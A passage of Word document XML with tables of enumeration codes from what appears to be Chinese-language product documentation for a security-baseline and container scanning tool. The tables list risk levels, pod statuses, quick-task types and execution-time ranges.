          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AFE43F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>系统基线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0E45ED70" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="230093AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="682E46C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="525E7F49" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>应用基线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2BB293F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="315" w:name="基线检查风险级别"/>
      <w:bookmarkEnd w:id="314"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>基线检查风险级别</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="667"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="807"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="675965F4"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7CE33FFF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="351B0E9A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A0BF240" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4B6DA9B8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BA92046" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52480714" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3044689A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>低风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="23822464" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4914E683" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41DC144B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33035FE2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>中风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="26E02A63" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52BAC826" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="629D4001" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45AD5D46" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>该风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00C6D749" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="316" w:name="pod状态"/>
      <w:bookmarkEnd w:id="315"/>
      <w:r>
        <w:t>pod状态</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="788"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1103"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="16179578"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73DAB49" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43E11053" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C3C084F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5E74DF4E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21CDDD1C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71A83DB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E542DFB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>running</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="19502CE0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44A7AD78" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FB6B147" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EBBE515" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5B23C6F4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33D64379" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DE75857" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F34E435" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>succeed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="55F7B9CD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="069468AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06801C6D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BCF2CD4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>failed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="71234BE2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B9FBFD2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A8EA6AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D9CBD9F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>unknown</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7223161C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="317" w:name="快速任务类型"/>
      <w:bookmarkEnd w:id="316"/>
      <w:r>
        <w:t>快速任务类型</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1059"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="05CB940D"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4714177F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68D64F8E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00B6F46C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="349E2065" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DFB6EC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>taskType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61D55BCE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="512FDF80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>系统内置任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="30D7F86A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="314D95F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>taskType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="087DEA76" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61987546" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户添加任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6861C941" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="318" w:name="快速任务执行时间范围"/>
      <w:bookmarkEnd w:id="317"/>
      <w:r>
        <w:t>快速任务执行时间范围</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1032"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1426"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="6F45F7BE"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0A72BF26" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F1BC3EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17388B55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7F85623F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A3E393E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7026FE39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22F3D6D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1分钟内</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2F3AA0FE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B1705EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D4AEC19" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E507238" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1~3分钟内</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="51F4A284" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="773EF129" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44B69746" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BD62921" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3~5分钟内</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6EBD484C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="310B7F64" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2122E636" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52E67903" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>5~10分钟内</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="54CEB034" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E8B6E23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="760D2F85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72E4F66D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>10~30分钟内</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="64B0828D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="184A976E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00A016F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="189D46C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>超出30分钟</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="628D4D26" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="319" w:name="快速任务扫描状态"/>
      <w:bookmarkEnd w:id="318"/>
      <w:r>
        <w:t>快速任务扫描状态</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="788"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="249AB1FF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61D59EF1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B3F7238" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C0DB30D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6E6111F3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
